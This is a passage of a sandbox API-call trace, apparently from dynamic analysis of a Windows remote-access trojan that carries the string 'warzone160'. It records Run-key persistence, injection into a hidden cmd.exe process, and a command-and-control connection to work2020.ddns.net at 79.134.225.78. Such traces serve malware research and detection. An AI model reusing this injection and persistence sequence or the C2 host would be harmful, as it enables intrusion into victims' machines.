returned="ZO6KLPO6XJ" [0186.038] VirtualFree (lpAddress=0xbb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.038] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0186.038] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xbb0000 [0186.038] lstrcpyW (in: lpString1=0xbb0000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0186.038] VirtualFree (lpAddress=0xbc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.038] GetProcessHeap () returned 0x900000 [0186.038] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9331f8 | out: hHeap=0x900000) returned 1 [0186.038] GetProcessHeap () returned 0x900000 [0186.038] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970d48 | out: hHeap=0x900000) returned 1 [0186.038] GetProcessHeap () returned 0x900000 [0186.038] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970b40 | out: hHeap=0x900000) returned 1 [0186.038] GetProcessHeap () returned 0x900000 [0186.038] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x947188 | out: hHeap=0x900000) returned 1 [0186.039] GetProcessHeap () returned 0x900000 [0186.039] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x930218 | out: hHeap=0x900000) returned 1 [0186.040] GetProcessHeap () returned 0x900000 [0186.040] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92e208 | out: hHeap=0x900000) returned 1 [0186.040] GetProcessHeap () returned 0x900000 [0186.040] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x942780 | out: hHeap=0x900000) returned 1 [0186.040] GetProcessHeap () returned 0x900000 [0186.040] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x95ef38 | out: hHeap=0x900000) returned 1 [0186.040] GetProcessHeap () returned 0x900000 [0186.040] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92d7f8 | out: hHeap=0x900000) returned 1 [0186.041] ReleaseMutex (hMutex=0x1c0) returned 0 [0186.041] CloseHandle (hObject=0x1c0) returned 1 [0186.041] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0186.041] GetProcessHeap () returned 0x900000 [0186.041] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x32) returned 0x970f90 [0186.041] lstrlenW (lpString="work2020.ddns.net") returned 17 [0186.041] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0xbc0000 [0186.041] lstrcpyW (in: lpString1=0xbc0000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0186.041] lstrlenW (lpString="images.exe") returned 10 [0186.041] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0xbd0000 [0186.041] lstrcpyW (in: lpString1=0xbd0000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0186.041] lstrlenW (lpString="Images") returned 6 [0186.041] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xbe0000 [0186.042] lstrcpyW (in: lpString1=0xbe0000, lpString2="Images" | out: lpString1="Images") returned="Images" [0186.042] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0186.042] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2be0000 [0186.042] lstrcpyW (in: lpString1=0x2be0000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0186.042] GetProcessHeap () returned 0x900000 [0186.042] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x200) returned 0x92d7f8 [0186.042] GetCurrentProcess () returned 0xffffffff [0186.042] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x34f524 | out: TokenHandle=0x34f524*=0x1c0) returned 1 [0186.042] GetTokenInformation (in: TokenHandle=0x1c0, TokenInformationClass=0x14, TokenInformation=0x34f51c, TokenInformationLength=0x4, ReturnLength=0x34f520 | out: TokenInformation=0x34f51c, ReturnLength=0x34f520) returned 1 [0186.042] CloseHandle (hObject=0x1c0) returned 1 [0186.042] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0186.042] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x2bf0000 [0186.042] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0186.042] lstrcpyW (in: lpString1=0x2bf0000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" [0186.042] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0186.042] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x2c00000 [0186.043] lstrcpyW (in: lpString1=0x2c00000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" [0186.043] VirtualFree (lpAddress=0x2bf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.043] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0186.043] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2bf0000 [0186.043] lstrcpyW (in: lpString1=0x2bf0000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0186.043] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0186.043] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0186.043] VirtualQuery (in: lpAddress=0x2c00000, lpBuffer=0x34f4dc, dwLength=0x1c | out: lpBuffer=0x34f4dc*(BaseAddress=0x2c00000, AllocationBase=0x2c00000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.043] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x2c10000 [0186.043] VirtualFree (lpAddress=0x2c00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.044] lstrcatW (in: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\", lpString2="ZO6KLPO6XJ" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ZO6KLPO6XJ") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ZO6KLPO6XJ" [0186.044] VirtualFree (lpAddress=0x2bf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.044] lstrlenW (lpString="inst") returned 4 [0186.044] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2bf0000 [0186.044] lstrlenW (lpString="inst") returned 4 [0186.044] lstrcpyW (in: lpString1=0x2bf0000, lpString2="inst" | out: lpString1="inst") returned="inst" [0186.044] lstrlenW (lpString="inst") returned 4 [0186.044] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2c00000 [0186.044] lstrcpyW (in: lpString1=0x2c00000, lpString2="inst" | out: lpString1="inst") returned="inst" [0186.044] VirtualFree (lpAddress=0x2bf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.045] lstrlenW (lpString="InitWindows") returned 11 [0186.045] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2bf0000 [0186.045] lstrlenW (lpString="InitWindows") returned 11 [0186.045] lstrcpyW (in: lpString1=0x2bf0000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows" [0186.045] lstrlenW (lpString="InitWindows") returned 11 [0186.045] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2c20000 [0186.045] lstrcpyW (in: lpString1=0x2c20000, lpString2="InitWindows" | out: lpString1="InitWindows") returned="InitWindows" [0186.045] VirtualFree (lpAddress=0x2bf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.045] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0186.045] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x2bf0000 [0186.046] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0186.046] lstrcpyW (in: lpString1=0x2bf0000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" [0186.046] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned 46 [0186.046] VirtualAlloc (lpAddress=0x0, dwSize=0x5e, flAllocationType=0x3000, flProtect=0x4) returned 0x2c30000 [0186.047] lstrcpyW (in: lpString1=0x2c30000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" [0186.047] VirtualFree (lpAddress=0x2bf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.047] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ZO6KLPO6XJ", ulOptions=0x0, samDesired=0xf003f, phkResult=0x34f5e0 | out: phkResult=0x34f5e0*=0x1c0) returned 0x0 [0186.047] RegQueryValueExW (in: hKey=0x1c0, lpValueName="inst", lpReserved=0x0, lpType=0x34f518, lpData=0x0, lpcbData=0x34f51c*=0x0 | out: lpType=0x34f518*=0x3, lpData=0x0, lpcbData=0x34f51c*=0x72) returned 0x0 [0186.047] GetProcessHeap () returned 0x900000 [0186.047] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x72) returned 0x90ffc0 [0186.047] RegQueryValueExW (in: hKey=0x1c0, lpValueName="inst", lpReserved=0x0, lpType=0x34f518, lpData=0x90ffc0, lpcbData=0x34f51c*=0x72 | out: lpType=0x34f518*=0x3, lpData=0x90ffc0*, lpcbData=0x34f51c*=0x72) returned 0x0 [0186.047] GetProcessHeap () returned 0x900000 [0186.047] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x72) returned 0x9100c0 [0186.047] GetProcessHeap () returned 0x900000 [0186.047] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x72) returned 0x910040 [0186.047] GetProcessHeap () returned 0x900000 [0186.047] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x32) returned 0x92da00 [0186.047] GetProcessHeap () returned 0x900000 [0186.047] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x72) returned 0x90ff40 [0186.048] GetProcessHeap () returned 0x900000 [0186.048] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x72) returned 0x910140 [0186.048] GetProcessHeap () returned 0x900000 [0186.048] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x90ff40 | out: hHeap=0x900000) returned 1 [0186.048] GetProcessHeap () returned 0x900000 [0186.048] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92da00 | out: hHeap=0x900000) returned 1 [0186.048] GetProcessHeap () returned 0x900000 [0186.048] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x910040 | out: hHeap=0x900000) returned 1 [0186.048] GetProcessHeap () returned 0x900000 [0186.048] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xe8) returned 0x92da00 [0186.048] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned 56 [0186.048] VirtualAlloc (lpAddress=0x0, dwSize=0x72, flAllocationType=0x3000, flProtect=0x4) returned 0x2bf0000 [0186.048] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned 56 [0186.048] lstrcpyW (in: lpString1=0x2bf0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe" [0186.048] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned 56 [0186.048] VirtualAlloc (lpAddress=0x0, dwSize=0x72, flAllocationType=0x3000, flProtect=0x4) returned 0x2c40000 [0186.048] lstrcpyW (in: lpString1=0x2c40000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe" [0186.048] VirtualFree (lpAddress=0x2bf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.049] GetProcessHeap () returned 0x900000 [0186.049] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x910140 | out: hHeap=0x900000) returned 1 [0186.049] GetProcessHeap () returned 0x900000 [0186.049] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x7d0) returned 0x92e010 [0186.049] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x92e010, nSize=0x3e8 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe")) returned 0x3c [0186.049] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe") returned 60 [0186.049] VirtualAlloc (lpAddress=0x0, dwSize=0x7a, flAllocationType=0x3000, flProtect=0x4) returned 0x2bf0000 [0186.049] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe") returned 60 [0186.049] lstrcpyW (in: lpString1=0x2bf0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" [0186.049] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe") returned 60 [0186.049] VirtualAlloc (lpAddress=0x0, dwSize=0x7a, flAllocationType=0x3000, flProtect=0x4) returned 0x2c50000 [0186.049] lstrcpyW (in: lpString1=0x2c50000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" [0186.049] VirtualFree (lpAddress=0x2bf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.049] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe") returned 60 [0186.049] VirtualAlloc (lpAddress=0x0, dwSize=0x7a, flAllocationType=0x3000, flProtect=0x4) returned 0x2bf0000 [0186.050] lstrcpyW (in: lpString1=0x2bf0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" [0186.050] VirtualFree (lpAddress=0x2c50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.050] GetProcessHeap () returned 0x900000 [0186.050] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9100c0 | out: hHeap=0x900000) returned 1 [0186.071] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2c50000 [0186.071] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x1c4 [0186.071] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x34f9ac | out: lpWSAData=0x34f9ac) returned 0 [0186.071] GetProcessHeap () returned 0x900000 [0186.071] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x32) returned 0x92daf0 [0186.071] lstrlenW (lpString="work2020.ddns.net") returned 17 [0186.072] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x2c60000 [0186.072] lstrcpyW (in: lpString1=0x2c60000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0186.072] lstrlenW (lpString="images.exe") returned 10 [0186.072] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2c70000 [0186.072] lstrcpyW (in: lpString1=0x2c70000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0186.072] lstrlenW (lpString="Images") returned 6 [0186.072] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2c80000 [0186.072] lstrcpyW (in: lpString1=0x2c80000, lpString2="Images" | out: lpString1="Images") returned="Images" [0186.072] lstrlenW (lpString="ZO6KLPO6XJ") returned 10 [0186.072] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2c90000 [0186.073] lstrcpyW (in: lpString1=0x2c90000, lpString2="ZO6KLPO6XJ" | out: lpString1="ZO6KLPO6XJ") returned="ZO6KLPO6XJ" [0186.073] GetProcessHeap () returned 0x900000 [0186.073] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x200) returned 0x92db30 [0186.073] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2ca0000 [0186.073] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x34f768 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0186.076] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Microsoft Vision\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\" [0186.076] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft vision"), lpSecurityAttributes=0x0) returned 0 [0186.077] GetCurrentProcess () returned 0xffffffff [0186.077] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x34f554 | out: Wow64Process=0x34f554) returned 1 [0186.077] VirtualAlloc (lpAddress=0x0, dwSize=0xff, flAllocationType=0x1000, flProtect=0x40) returned 0x2cc0000 [0186.077] GetWindowsDirectoryA (in: lpBuffer=0x2cc0000, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0186.077] lstrlenA (lpString="C:\\Windows") returned 10 [0186.077] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x34f4f8*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x34f544 | out: lpCommandLine=0x0, lpProcessInformation=0x34f544*(hProcess=0x1cc, hThread=0x1d4, dwProcessId=0x318, dwThreadId=0x350)) returned 1 [0186.181] Sleep (dwMilliseconds=0x3e8) [0187.778] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x318) returned 0x1dc [0187.778] GetCurrentProcessId () returned 0x7b8 [0187.778] GetProcessHeap () returned 0x900000 [0187.778] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xff) returned 0x92e850 [0187.778] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x92e850, nSize=0xff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe")) returned 0x3c [0187.778] VirtualAllocEx (hProcess=0x1dc, lpAddress=0x0, dwSize=0x800, flAllocationType=0x3000, flProtect=0x40) returned 0x110000 [0187.778] WriteProcessMemory (in: hProcess=0x1dc, lpBaseAddress=0x110000, lpBuffer=0x418158*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x418158*, lpNumberOfBytesWritten=0x0) returned 1 [0187.779] VirtualProtectEx (in: hProcess=0x1dc, lpAddress=0x110000, dwSize=0x800, flNewProtect=0x40, lpflOldProtect=0x34f4d8 | out: lpflOldProtect=0x34f4d8*=0x40) returned 1 [0188.371] VirtualAllocEx (hProcess=0x1dc, lpAddress=0x0, dwSize=0x103, flAllocationType=0x3000, flProtect=0x4) returned 0x120000 [0188.371] WriteProcessMemory (in: hProcess=0x1dc, lpBaseAddress=0x120000, lpBuffer=0x34f3d4*, nSize=0x103, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x34f3d4*, lpNumberOfBytesWritten=0x0) returned 1 [0188.371] CreateRemoteThread (in: hProcess=0x1dc, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x11010e, lpParameter=0x120000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d8 [0188.375] lstrlenW (lpString="work2020.ddns.net") returned 17 [0188.375] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0188.376] lstrcpyW (in: lpString1=0x2cd0000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0188.376] lstrlenW (lpString="work2020.ddns.net") returned 17 [0188.376] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0x2ce0000 [0188.376] lstrcpyW (in: lpString1=0x2ce0000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0188.376] VirtualAlloc (lpAddress=0x0, dwSize=0x1, flAllocationType=0x3000, flProtect=0x4) returned 0x2cf0000 [0188.377] lstrlenW (lpString="work2020.ddns.net") returned 17 [0188.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="work2020.ddns.net", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0188.377] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0x2d00000 [0188.377] lstrlenW (lpString="work2020.ddns.net") returned 17 [0188.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="work2020.ddns.net", cchWideChar=17, lpMultiByteStr=0x2d00000, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="work2020.ddns.net", lpUsedDefaultChar=0x0) returned 17 [0188.377] lstrlenA (lpString="work2020.ddns.net") returned 17 [0188.377] lstrlenA (lpString="work2020.ddns.net") returned 17 [0188.377] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0x2d10000 [0188.378] lstrcpyA (in: lpString1=0x2d10000, lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0188.378] VirtualFree (lpAddress=0x2cf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.378] lstrlenA (lpString="work2020.ddns.net") returned 17 [0188.378] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2cf0000 [0188.378] lstrcatA (in: lpString1="", lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0188.378] VirtualFree (lpAddress=0x2d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.378] VirtualFree (lpAddress=0x2d00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.379] VirtualFree (lpAddress=0x2c50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.379] lstrlenA (lpString="work2020.ddns.net") returned 17 [0188.379] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2c50000 [0188.379] lstrcatA (in: lpString1="", lpString2="work2020.ddns.net" | out: lpString1="work2020.ddns.net") returned="work2020.ddns.net" [0188.379] WaitForSingleObject (hHandle=0x1c4, dwMilliseconds=0xffffffff) returned 0x0 [0188.379] getaddrinfo (in: pNodeName="work2020.ddns.net", pServiceName=0x0, pHints=0x34f504*(ai_flags=0, ai_family=0, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x34f524 | out: ppResult=0x34f524*=0x92f038*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x92fc78*(sa_family=2, sin_port=0x0, sin_addr="79.134.225.78"), ai_next=0x0)) returned 0 [0190.426] socket (af=2, type=1, protocol=0) returned 0x228 [0190.426] htons (hostshort=0x69a) returned 0x9a06 [0190.426] FreeAddrInfoW (pAddrInfo=0x92f038*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x92fc78*(sa_family=2, sin_port=0x0, sin_addr="79.134.225.78"), ai_next=0x0)) [0190.426] connect (s=0x228, name=0x34fb3c*(sa_family=2, sin_port=0x69a, sin_addr="79.134.225.78"), namelen=16) returned 0 [0190.662] ReleaseMutex (hMutex=0x1c4) returned 1 [0190.662] VirtualFree (lpAddress=0x2cf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.662] VirtualFree (lpAddress=0x2ce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.663] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.664] setsockopt (s=0x228, level=65535, optname=4102, optval="`ê", optlen=4) returned 0 [0190.664] lstrlenA (lpString="warzone160") returned 10 [0190.664] lstrlenA (lpString="warzone160") returned 10 [0190.664] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0190.665] lstrcpyA (in: lpString1=0x2cd0000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160" [0190.665] lstrlenA (lpString="warzone160") returned 10 [0190.665] GetProcessHeap () returned 0x900000 [0190.665] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x92fc78 [0190.665] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.665] recv (in: s=0x228, buf=0x33f4f0, len=12, flags=0 | out: buf=0x33f4f0*) returned 12 [0190.895] GetProcessHeap () returned 0x900000 [0190.895] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x92f9f0 [0190.895] GetProcessHeap () returned 0x900000 [0190.895] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x92fc90 [0190.895] GetProcessHeap () returned 0x900000 [0190.895] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x92fca8 [0190.895] GetProcessHeap () returned 0x900000 [0190.895] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x92fcc0 [0190.895] GetProcessHeap () returned 0x900000 [0190.895] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x92fd38 [0190.895] GetProcessHeap () returned 0x900000 